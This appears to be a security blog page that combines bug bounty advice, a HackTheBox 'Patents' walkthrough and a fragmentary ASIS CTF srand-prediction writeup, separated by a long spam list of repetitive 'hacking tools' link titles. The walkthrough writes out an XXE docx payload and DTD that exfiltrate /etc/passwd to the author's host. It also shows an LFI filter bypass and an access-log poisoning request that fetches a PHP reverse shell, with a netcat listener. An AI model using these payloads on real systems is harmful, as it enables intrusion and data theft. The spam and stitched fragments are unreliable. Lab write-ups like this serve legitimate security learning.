lunes, 31 de agosto de 2020

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Continue reading

domingo, 30 de agosto de 2020

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc
cd doc
unzip ../sample.docx
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml
cd customXml
vim item1.xml
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>">
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx *
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>"
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3
Boom! we have a shell.

That's it for today's article see you next time.

References

Read more


  1. Pentest Tools Open Source
  2. Hacker Tools Free Download
  3. How To Install Pentest Tools In Ubuntu
  4. Hack Tools 2019
  5. Hack Apps
  6. Hacker Tools List
  7. Pentest Tools Download
  8. Pentest Recon Tools
  9. Hacking Tools For Games
  10. Tools Used For Hacking
  11. Pentest Tools Nmap
  12. World No 1 Hacker Software
  13. Ethical Hacker Tools
  14. Hack Tools For Games
  15. What Are Hacking Tools
  16. Hacking Tools Usb
  17. Pentest Tools Kali Linux
  18. Hacker Tools 2020
  19. Nsa Hack Tools
  20. Hack Tools Github
  21. Hacker Tools Software
  22. Hacking Tools Usb
  23. Growth Hacker Tools
  24. Pentest Tools Free
  25. What Are Hacking Tools
  26. Hacker Tools For Windows
  27. Beginner Hacker Tools
  28. Hack Website Online Tool
  29. Hacks And Tools
  30. Kik Hack Tools
  31. Pentest Tools For Windows
  32. Black Hat Hacker Tools
  33. Pentest Tools Open Source
  34. Hackrf Tools
  35. How To Install Pentest Tools In Ubuntu
  36. Hacker Search Tools
  37. Hack And Tools
  38. Install Pentest Tools Ubuntu
  39. Hack Tool Apk
  40. Hacking Tools Software
  41. Hacking Tools For Windows
  42. Blackhat Hacker Tools
  43. Hacking Tools Github
  44. Hacker Tools Free Download
  45. Hacking Tools For Windows 7
  46. Hacking Tools Github
  47. Pentest Tools For Ubuntu
  48. Hacking App
  49. Hacker Tools For Ios
  50. Hacking Tools For Windows
  51. Hacking Tools Pc
  52. Hacker
  53. Pentest Reporting Tools
  54. Kik Hack Tools
  55. Hack Tools Online
  56. Pentest Tools Apk
  57. Hacking Tools 2020
  58. Hacking Tools Mac
  59. Android Hack Tools Github
  60. Hacking Tools And Software
  61. Hacker Tools For Pc
  62. Hackrf Tools
  63. Hacker Tools Linux
  64. Pentest Tools List
  65. Usb Pentest Tools
  66. New Hacker Tools
  67. Hacking Tools Hardware
  68. How To Install Pentest Tools In Ubuntu
  69. Hacking Tools For Beginners
  70. Hack Tools Mac
  71. Underground Hacker Sites
  72. Pentest Tools Online
  73. Hack Tools Pc
  74. Hack Tools For Ubuntu
  75. Bluetooth Hacking Tools Kali
  76. Hacking Tools Name
  77. Hacking Tools Free Download
  78. Pentest Tools Download
  79. Hack Tools Mac
  80. Pentest Reporting Tools
  81. Beginner Hacker Tools
  82. Pentest Tools Port Scanner
  83. Easy Hack Tools
  84. Install Pentest Tools Ubuntu
  85. Hackrf Tools
  86. Free Pentest Tools For Windows
  87. Pentest Tools Alternative
  88. Hackers Toolbox
  89. Pentest Tools Alternative
  90. Hacker Tools Free Download
  91. Termux Hacking Tools 2019
  92. Hack App
  93. Blackhat Hacker Tools
  94. Hacking Tools Hardware
  95. Hacker Hardware Tools
  96. Hack Tools Download
  97. Pentest Tools Alternative
  98. Blackhat Hacker Tools
  99. Bluetooth Hacking Tools Kali
  100. Hacker Tools For Windows
  101. Usb Pentest Tools
  102. Hacking Tools Hardware
  103. Pentest Tools For Windows
  104. Hacking Tools For Mac
  105. Kik Hack Tools
  106. Wifi Hacker Tools For Windows
  107. Pentest Reporting Tools
  108. Pentest Reporting Tools
  109. Hack App
  110. Hacker Security Tools
  111. Hack App
  112. Hacking Tools 2019
  113. Hacking Tools Kit
  114. Pentest Tools For Android
  115. Pentest Tools For Mac
  116. Pentest Tools Github
  117. Pentest Tools Windows
  118. Pentest Tools Port Scanner
  119. Nsa Hack Tools Download
  120. Pentest Tools Free
  121. Pentest Tools For Mac
  122. New Hack Tools
  123. Github Hacking Tools
  124. Hacker Tools 2020
  125. Hacker Tools Free
  126. Hacking Tools Pc
  127. Pentest Tools Tcp Port Scanner
  128. Bluetooth Hacking Tools Kali
  129. Pentest Tools Android
  130. Hack App
  131. What Are Hacking Tools
  132. Easy Hack Tools
  133. Hacking Tools Usb
  134. Pentest Tools Port Scanner
  135. Github Hacking Tools
  136. Hacking Tools Hardware
  137. What Is Hacking Tools
  138. Top Pentest Tools
  139. Pentest Tools
  140. Blackhat Hacker Tools
  141. Hacking Tools For Pc
  142. Hack Tools For Games
  143. Best Hacking Tools 2019
  144. How To Make Hacking Tools
  145. Hacking Tools Usb
  146. Tools Used For Hacking
  147. Hacking Tools Download
  148. Hacker Tools 2019
  149. Growth Hacker Tools
  150. Hacker Tools For Ios
  151. Pentest Tools
  152. Pentest Tools Online
  153. Pentest Tools Subdomain
  154. Hacker Tools 2019
  155. Hack Rom Tools
  156. Pentest Tools Nmap
  157. Hacking Tools For Windows 7
  158. Hack Tools For Windows
  159. Pentest Tools Port Scanner
  160. Pentest Reporting Tools
  161. Hacker Tools For Ios
  162. Game Hacking
  163. Hack Tools For Mac
  164. Hack Apps
  165. Hacker Tools Apk Download
  166. Hack Tools Mac
  167. Hacker Tools Github
  168. Hack Tool Apk No Root
  169. Hack Tools For Ubuntu
  170. Pentest Reporting Tools
  171. Bluetooth Hacking Tools Kali
  172. Pentest Tools Review
  173. Blackhat Hacker Tools
  174. Hacker Tools For Ios
  175. Wifi Hacker Tools For Windows
  176. Hack Tool Apk No Root
  177. Hack Tool Apk No Root

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction


The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Continue reading